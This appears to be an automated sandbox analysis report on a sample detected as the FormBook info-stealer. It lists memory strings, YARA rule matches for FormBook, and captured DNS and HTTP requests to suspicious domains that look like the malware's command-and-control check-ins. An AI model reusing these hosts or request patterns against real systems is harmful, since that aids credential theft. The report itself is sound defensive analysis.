Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.newtek.com/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/JetBrains.Annotations/10.1.5)
Source: explorer.exe, 00000005.00000000.1234977867.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/
Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/iframe_api
Source: explorer.exe, 00000005.00000002.3748918987.000000001197F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.3713430429.0000000004DFF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

Source: unknown

DNS traffic detected: queries for: www.klxcv.xyz

Source: C:\Windows\explorer.exe

Code function: 5_2_10B4FF82 getaddrinfo,setsockopt,recv,

5_2_10B4FF82

Source: global traffic	HTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=jZmXybDTEhqhfjbWt8DWyZKNvc7QdVfFN8RblV5F5bs2BRUWluOZEJKJ+J3f2kZBRyfQB9gctA== HTTP/1.1Host: www.gaming-chairs-vn-vi-2885437.fyiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?Bb_=n8Crfq9d8L0uMe2mi2N2bIuprmrMns3qA2Eid6rDPq5MkWbkjsGFJF992xVz/9ETWq9TUrQEIA==&M2Mp=6lX0R0Q HTTP/1.1Host: www.sklm888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=9Lm8jqPme8OjdFMw6eGY6bGRl079o6M7fF/LdPaGLMmXDMBCcOms1FNC+m6WNGhZ2iLvmxSXpQ== HTTP/1.1Host: www.wokeeducationhateskids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q HTTP/1.1Host: www.umertazkeer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?Bb_=gDkZXs6+uubhkTTBwUg7wBT+4b2V8qQlIvdPiiNfmflrZ9ZAj1bLhBmsLpsiQ7EDnpvm500CUg==&M2Mp=6lX0R0Q HTTP/1.1Host: www.glocraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA== HTTP/1.1Host: www.durufilmyapim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404FF1

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: xheuzyg.exe PID: 1356, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: xheuzyg.exe PID: 1664, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 4312, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: xheuzyg.exe PID: 1356, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
